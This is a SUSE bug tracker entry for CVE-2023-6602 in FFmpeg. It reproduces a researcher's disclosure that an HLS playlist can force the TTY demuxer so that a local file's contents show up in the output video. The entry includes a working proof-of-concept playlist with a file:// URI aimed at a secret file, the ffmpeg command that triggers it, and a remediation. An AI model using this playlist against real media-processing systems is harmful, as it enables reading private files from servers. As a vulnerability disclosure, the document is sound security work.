Bug 1220546 (CVE-2023-6602) - VUL-0: CVE-2023-6602: ffmpeg,ffmpeg-4:HLS Force TTY Demuxer
Summary: VUL-0: CVE-2023-6602: ffmpeg,ffmpeg-4:HLS Force TTY Demuxer
Status: NEW
Alias: CVE-2023-6602
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: E-mail List
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/395219/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-6602:3.3:(AV:L...
Keywords:
Depends on:
Blocks:
 
Reported: 2024-02-28 11:01 UTC by SMASH SMASH
Modified: 2024-07-03 05:19 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
stoyan.manolov: needinfo? (gnome-bugs)

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description SMASH SMASH 2024-02-28 11:01:31 UTC 
FFmpeg Findings 2023.12.01
Overview
Included in this document are five (5) bugs in the open-source package ffmpeg. Internal CVSS 3.1 scoring for these bugs range from 3.9 to 7.2. Attribution for these findings: Harvey Phillips of Amazon Element55 (element55@amazon.com).

If the recipient of this notice (secalert@redhat.com) has any questions regarding these findings, please do not hesitate to contact us at element55@amazon.com.

II. HLS Force TTY Demuxer
Affected Versions: 2.0 (at least) → 6.0 (latest)

There is a commit upstream which prevents this issue by enforcing a file extension check on HLS playlists. Currently this commit is not in any FFmpeg release branch (6.0 being the latest).




Suggested CVSS 3.1: 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary
For an instance of FFmpeg that does not enforce an input format, the TTY demuxer can be triggered even when the input file does not meet the TTY requirements.


Impact
The TTY demuxer treats all input as ASCII and renders it in the video output. This issue could therefore allow for possible data exfiltration.


Description
The TTY demuxer is normally only triggered if the input file has one of the following extensions: ans, art, asc, diz, ice, nfo, txt, or vt. Applying (1) but using e.g. the .ans extension produces an error:



[hls @ 0xaaab130f79c0] Filename extension of 'data://text/plain;base64,QUFBQUFBQUEK=.ans' is not a common multimedia extension, blocked for security reasons.
If you wish to override this adjust allowed_extensions, you can set it to 'ALL' to allow all

However, FFmpeg continues to parse the remainder of the segments in the HLS playlist with the TTY demuxer.


Reproduction
Example Input (input.mp4):


#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1,
data://text/plain;base64,QUFBQUFBQUEK=.ans
#EXTINF:1,
data://text/plain;base64,IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwoK=.m3u8
#EXTINF:1,
file:///some/secret/file/with/a/media/extension.ext
#EXT-X-ENDLIST


Trigger with ffmpeg -i input.mp4 output.mp4. Playing output.mp4 will show the contents of the file in the file:// URI printed out in the video playback.


Remediation
If the common multimedia extension check fails, the demuxer that was identified should be discarded and the identification process should begin anew with the next input in the playlist.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6602
https://bugzilla.redhat.com/show_bug.cgi?id=2253172